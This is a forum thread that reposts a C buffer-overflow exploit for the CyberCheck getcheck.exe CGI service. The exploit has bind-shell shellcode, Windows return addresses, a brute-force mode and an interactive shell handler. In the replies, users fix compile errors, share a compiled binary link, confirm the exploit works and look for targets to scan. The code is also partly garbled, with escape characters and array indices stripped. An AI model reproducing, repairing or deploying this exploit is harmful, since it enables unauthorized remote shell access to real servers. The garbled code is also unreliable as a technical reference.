[cyrixx]

/* 
    _       ___ _ _         _       _               
  __| |_ _ / __| | | _ _   (_)_   _| |__   __ _ ___ 
/ _` | '_| (_ |_   _| '   | | || | '_ / _` (_-< 
__,_|_|   ___| |_||_||_|/ |_,_|_.__/__,_/__/ 
                        |__/   Presents...       

Cybercheck Buffer Overflow Exploit 

CyberCheck is a subsystem of handling business-to-business transactions 
involving the electronic document interchange for the clients registered 
in CyberPlat. Learn more on www.cyberplat.com 

Details: 
When you use incoreect request method, getcheck.exe call sprintf to write into 
log: sprintf(buffer,"CGI_CheckEnvironment: Invalid REQUEST_METHOD=%s.", ...) 
If you use too long method, buffer will be overrun. 

Vulnerability discovered by drG4njubas of m00. 
Contacts: drG4njubas@bk.ru, http://m00.void.ru 

Thanks to d4rkgr3y for porting to linux. 

*/ 




#include <windows.h> 
#include <winsock.h> 
#include <winbase.h> 
#include <stdio.h> 

#pragma comment (lib,"wsock32") 

void usage(); 
void have_fun(SOCKET sock); 

struct{ 
char *platform; 
DWORD retaddr; 
} 

targets[]={ 
{"Windows 2k sp4 eng" , 0x7c4fedbb }, 
{"Windows 2k sp3 rus" , 0x77E822EA }, 
{"Windows xp sp1 rus" , 0x77e626ba }, 
{"Windows xp sp0 rus" , 0x77f5801c }, 
{"Windows nt sp6 rus" , 0x77f32935 }, 
NULL 
}; 


char shellcode[]= 
//Generic win32 shellcode I coded(binds shell to a port 61200) 
"x90x90x90x90x90xEBx0Fx58x80x30xBBx40x81x38x6D" 
"x30x30x21x75xF4xEBx05xE8xECxFFxFFxFFx52xD7xBA" 
"xBBxBBxE6xEEx8Ax60xDFx30xB8xFBx28x30xF8x44xFB" 
"xCEx42x30xE8xB8xDDx8Ax69xDDx03xBBxABxDDx3Ax81" 
"xF6xE1xCFxBCx92x79x52x49x44x44x44x32x68x30xC1" 
"x87xBAx6CxB8xE4xC3x30xF0xA3x30xC8x9Bx30xC0x9F" 
"xBAx6DxBAx6Cx47x16xBAx6Bx2Dx3Cx46xEAx8Ax72x3B" 
"x7AxB4x48x1DxC9xB1x2DxE2x3Cx46xCFxA9xFCxFCx59" 
"x5Dx05xB4xBBxBBxBBx92x75x92x4Cx52x53x44x44x44" 
"x8Ax7BxDDx30xBCx7Ax5BxB9x30xC8xA7xBAx6DxBAx7D" 
"x16xBAx6Bx32x7Dx32x6CxE6xECx36x26xB4xBBxBBxBB" 
"xE8xECx44x6Dx36x26xE8xBBxBBxBBxE8x44x6Bx32x7C" 
"x36x3ExE1xBBxBBxBBxEBxECx44x6Dx36x36x2CxBBxBB" 
"xBBxEAxD3xB9xBBxBBxBBx44x6Bx36x26xDExBBxBBxBB" 
"xE8xECx44x6Dx8Ax72xEAxEAxEAxEAxD3xBAxBBxBBxBB" 
"xD3xB9xBBxBBxBBx44x6Bx32x78x36x3ExCBxBBxBBxBB" 
"xEBxECx44x6DxD3xABxBBxBBxBBx36x36x38xBBxBBxBB" 
"xEAxE8x44x6Bx36x3ExCExBBxBBxBBxEBxECx44x6DxD3" 
"xBAxBBxBBxBBxE8x44x6Bx36x3ExC7xBBxBBxBBxEBxEC" 
"x44x6Dx8Ax72xEAxEAxE8x44x6BxE4xEBx36x26xFCxBB" 
"xBBxBBxE8xECx44x6DxD3x44xBBxBBxBBxD3xFBxBBxBB" 
"xBBx44x6Bx32x78x36x36x93xBBxBBxBBxEAxECx44x6D" 
"xE8x44x6BxE3x32xF8xFBx32xF8x87x32xF8x83x7CxF8" 
"x97xBAxBAxBBxBBx36x3Ex83xBBxBBxBBxEBxECx44x6D" 
"xE8xE8x8Ax72xEAxEAxEAxD3xBAxBBxBBxBBxEAxEAx36" 
"x26x04xBBxBBxBBxE8xEAx44x6Bx36x3ExA7xBBxBBxBB" 
"xEBxECx44x6Dx44x6Bx53x34x45x44x44xFCxDExCFxEB" 
"xC9xD4xD8xFAxDFxDFxC9xDExC8xC8xBBxF7xD4xDAxDF" 
"xF7xD2xD9xC9xDAxC9xC2xFAxBBxFExC3xD2xCFxEBxC9" 
"xD4xD8xDExC8xC8xBBxFCxDExCFxE8xCFxDAxC9xCFxCE" 
"xCBxF2xD5xDDxD4xFAxBBxF8xC9xDExDAxCFxDExEBxC9" 
"xD4xD8xDExC8xC8xFAxBBxFCxD7xD4xD9xDAxD7xFAxD7" 
"xD7xD4xD8xBBxCCxC8x89xE4x88x89xBBxECxE8xFAxE8" 
"xCFxDAxC9xCFxCExCBxBBxECxE8xFAxE8xD4xD8xD0xDE" 
"xCFxFAxBBxD9xD2xD5xDFxBBxD7xD2xC8xCFxDExD5xBB" 
"xDAxD8xD8xDExCBxCFxBBxB9xBBx54xABxBBxBBxBBxBB" 
"xBBxBBxBBxBBxBBxBBxBBxBBxBAxBBxBBxBBxBBxBBxBB" 
"xBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBB" 
"xBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBB" 
"xBBxBBxBBxBBxBBxBBxBBxD8xD6xDFxBBx6Dx30x30x21"; 

char URI[255] = " /cgi-bin/getcheck.exe"; 
char request[]= " HTTP/1.1rnAccept: */*rn"; 


void main(int argc, char **argv){ 
WSADATA wsaData; 
SOCKADDR_IN rmaddr,rmshell; 
HOSTENT *addr; 
SOCKET sock,shell; 
char exploit[2023+sizeof(shellcode)-1]; 
char *uri,*tmp, host[255]; 
int i,t,ret,ok,start,end,bruteforce; 

printf("************************************************n"); 
printf("Cybercheck buffer overflow exploit by drG4njubasn"); 
printf("************************************************nn"); 

if(argc<3){ 
usage(); 
return; 
} 

uri = 0; 
t = 0; 
bruteforce = 0; 
for(i = 3; i < argc; i++){ 
if(strncmp(argv, "/u", 2)==0){ 
uri = argv; 
uri[2] == ':' ? (uri+=3) : (uri+=2); 
} 
else if(strncmp(argv,"/t", 2)==0){ 
tmp = argv; 
tmp[2] == ':' ? (tmp+=3) : (tmp+=2); 
t = atoi(tmp); 
} 
else if(strncmp(argv,"/b", 2)==0 && i+2 < argc){ 
start = strtoul(argv[i+1],0,0); 
end = strtoul(argv[i+2],0,0); 
i+=2; 
bruteforce=1; 
} 
} 

if(uri)strncpy(URI+1, uri, 254); 
if(!bruteforce){ 
i=0; 
while(targets.platform)i++; 
if(t >= i){ 
printf("Bad target number.n"); 
return; 
} 
start = targets[t].retaddr; 
end = targets[t].retaddr; 
} 

for(i = 0; i<2019; i++)exploit = 'a'; 
memcpy(exploit+2023, shellcode, sizeof(shellcode)-1); 
_snprintf(host, 255, "Host: %srnrn", argv[1]); 

WSAStartup(MAKEWORD(2,2), &wsaData); 
printf("[+]Resolving %sn", argv[1]); 
addr = gethostbyname(argv[1]); 
if(addr != NULL){ 
memcpy(&(rmaddr.sin_addr.s_addr), addr->h_addr_list[0], addr->h_length); 
memcpy(&(rmshell.sin_addr.s_addr), addr->h_addr_list[0], addr->h_length); 
} 
else{ 
printf("[-]Can not resolve host namen"); 
return; 
} 

rmaddr.sin_family = AF_INET; 
rmshell.sin_family = AF_INET; 
rmaddr.sin_port = htons(atoi(argv[2])); 
rmshell.sin_port = htons(61200); 
shell = socket(AF_INET, SOCK_STREAM, 0); 

if(bruteforce)printf("[+]Starting bruteforce from %p to %pn", start, end); 
for(ret = start; ret <= end; ret++){ 
sock = socket(AF_INET, SOCK_STREAM, 0); 
if(!bruteforce)printf("[+]Connecting to %sn", argv[1]); 
if(connect(sock,(struct sockaddr *)&rmaddr,sizeof(rmaddr))){ 
printf("[-]Connection failedn"); 
return; 
} 

if(!bruteforce)printf("[+]Using ret for %sn", targets[t].platform); 
memcpy(exploit+2019, &ret, 4); 
ok = 1; 
for(i = 2019; i< 2023; i++) 
if(exploit == 0x00 || exploit == 0x0A || exploit == 0x20)ok = 0; 
if(ok){ 
if(bruteforce)printf("   - Trying ret 0x%pn", ret); 
else printf("[+]Sending exploitn"); 
send(sock, exploit, 2023+sizeof(shellcode)-1, 0); 
send(sock, URI, strlen(URI), 0); 
send(sock, request, sizeof(request)-1, 0); 
send(sock, host, strlen(host), 0); 
closesocket(sock); 
if(!connect(shell,(struct sockaddr *)&rmshell,sizeof(rmshell))){ 
        printf("[+]Congratulations!!! You've got shell;Dnn"); 
have_fun(shell); 
break; 
} 
else if(!bruteforce)printf("[-]Exploitation failed;(n"); 
} 
else printf("   - Ret %p can not be used!n", ret); 
} 
closesocket(shell); 
WSACleanup(); 
} 

void usage(){ 
int i; 
printf("USAGE: n"); 
printf("m00-cybercheck.exe <host> <port> [/u:Request-URI] [/t:num] [/b start end] n"); 
printf("<host>   - hostname(example: www.cyberplat.ru)n"); 
printf("<port>   - portnumber(example: 80)n"); 
printf("[/u:uri] - request-uri(default: /cgi-bin/getcheck.exe)n"); 
printf("[/t:num] - target number(see "TARGETS")n"); 
printf("[/b start end] - bruteforce mode(don't use it with /t key)nn"); 

printf("TARGETS:n"); 
for(i =0; targets.platform; i++) 
printf("%d - %sn", i, targets.platform); 

    printf("nEXAMPLE:n"); 
printf("m00-cybercheck.exe www.host.ru 80 /u:/scripts/getcheck.exe /t2n"); 
printf("m00-cybercheck.exe www.host.ru 80 /b 0x11223344 0x55667788nn"); 
} 


/* 
  have fun with a nice cmd.exe shell;D 
*/ 

void have_fun(SOCKET sock){ 
char buf[1024]; 
int i,j,read,written; 
fd_set fdread; 
TIMEVAL time; 
HANDLE std_in, std_out; 
INPUT_RECORD rec; 
time.tv_sec = 1; 
time.tv_usec = 0; 
std_in = GetStdHandle(STD_INPUT_HANDLE); 
std_out = GetStdHandle(STD_OUTPUT_HANDLE); 
SetConsoleMode(std_in, ENABLE_ECHO_INPUT | ENABLE_PROCESSED_INPUT); 
do{ 
FD_ZERO(&fdread); 
FD_SET(sock, &fdread); 
i = select(0, &fdread, NULL, NULL, &time); 
if(i > 0){ 
if((j = recv(sock, buf, 1024, 0)) == SOCKET_ERROR)return; 
WriteConsole(std_out, buf, j, &written, NULL); 
} 
PeekConsoleInput(std_in, &rec,1, &read); 
if(read){ 
ReadConsole(std_in, buf, 1024, &read, NULL); 
if(send(sock, buf, read, 0) == SOCKET_ERROR)return; 
}   
}while(i != SOCKET_ERROR); 
return; 
}

[nolimit]

lots of compile errors, don't have time atm to go through atm, if someone else does.
some lines i found that didn't smell right
for(i = 0; i<2019; i++)exploit = 'a';

and

while(targets.platform)i++;
guessing it should be targets[i].platform.
I'll try it some more later, gotta get back to work

[x1`]

port 80 then ?

[nolimit]

depends on the HTTP server , but of course most are port 80, so yes.

[fre4k]

are they any vuln scanner for it B)

*sry for my bad english*

-fre4k

[mortello]

Damn guys, this just got out of nowhere and you already ask for what port to scan (this is a bit stupid of a question) and that other guy asks for the scanner....not everything falls off trees....just relax and wait if you don't know how to compile....

Edit : Can't compile this one, I'll wait for the error-free code

[x1`]

i cant compile it :( what compiler to use?

[fre4k]

hey can compile this one! anybody need?

[x1`]

yep i do can u post it in downloads section , and proabably other people need it

[fre4k]

Here it is :D

www.wordi.de/Download/crec.rar


have fun ^^

-fre4k


PLZ notice if this works ^^ THX

[x1`]

that link dosent work please fix or just attact the file to downloads section

[fre4k]

copy This:

www.wordi.de/Download/crec.rar

in your i-net-explorer and it works ^^ ka why?! :D

[x1`]

oh sorry about that my mistake thx for the compiled version

[nolimit]

�╔▐┌╧▐δ╔╘╪▐╚╚�╗ⁿ╫╘┘┌╫�╫╫╘╪╗╠╚�Σ��╗∞Φ�Φ╧┌╔╧╬╦╗∞Φ�Φ╘╪╨▐╧�╗┘╥╒▀╗╫╥╚╧▐╒╗┌╪╪▐╦╧╗╣╗T�╗
╗╗╗╗╗╗╗╗╗╗╗║╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╪╓▀╗m00! /cgi-bin/getcheck.exe HTTP/1.1
Accept: */*
Host: 127.0.0.1
 sent 0, rcvd 2688

Works, nice job dude. Didn't have to patience to go through it atm.

[phaeton]

yep, the app worx, just trying to scan for links go getcheck.exe (if thats the name of the default service) but can't find any yet.